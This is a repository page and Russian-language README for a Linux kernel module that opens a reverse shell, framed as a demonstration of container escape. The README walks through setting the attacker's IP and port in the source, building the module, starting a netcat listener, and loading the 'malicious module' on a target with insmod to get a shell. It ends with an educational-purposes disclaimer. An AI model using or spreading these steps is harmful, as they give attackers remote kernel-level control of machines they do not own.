A Linux kernel module that performs a reverse shell https://vadimbelous.com
Go to file
2024-07-06 17:10:46 +03:00
.gitignore Initial commit 2024-07-03 15:22:58 +03:00
LICENSE Initial commit 2024-07-03 15:22:58 +03:00
Makefile upload source code 2024-07-04 01:34:14 +04:00
README.md Update README.md 2024-07-06 17:10:46 +03:00
reverse-shell.c upload source code 2024-07-04 01:34:14 +04:00

LKM Reverse Shell

В этом репозитории представлен модуль ядра Linux, который выполняет обратный вызов на прослушиватель для установки обратной оболочки

Инструкция по использованию

Для успешной эксплуатации необходимо подготовить инструментарий для сборки модулей ядра на атакующей машине. Установите пакет build-essential и заголовки ядра:

sudo apt install build-essential linux-headers-$(uname -r)

После клонирования репозитория, откройте файл reverse-shell.c и измените 13 строку, указав ваш IP-адрес и порт. Затем соберите модуль:

git clone https://git.vadimbelous.com/vadim_belous/lkm_reverse_shell.git
cd lkm_reverse_shell
$EDITOR reverse-shell.c
make

Получившийся в результате успешной сборки файл reverse-shell.ko это и есть нужный модуль ядра

Запустите прослушиватель на машине атакующего:

nc -lvnp $PORT

Перенесите вредоносный модуль на целевую машину и подгрузите его в ядро:

insmod reverse-shell.ko

Если вы всё сделали правильно, на прослушиватель придёт обратный вызов и установится обратная командная оболочка

Disclaimer

Этот репозиторий создан исключительно в образовательных целях, чтобы продемонстрировать потенциальные методы эксплуатации контейнерных сред путем загрузки вредоносного модуля (LKM) в ядро хостовой ОС. Автор данного репозитория не несет ответственности за любые неправомерные действия, совершенные с использованием этого кода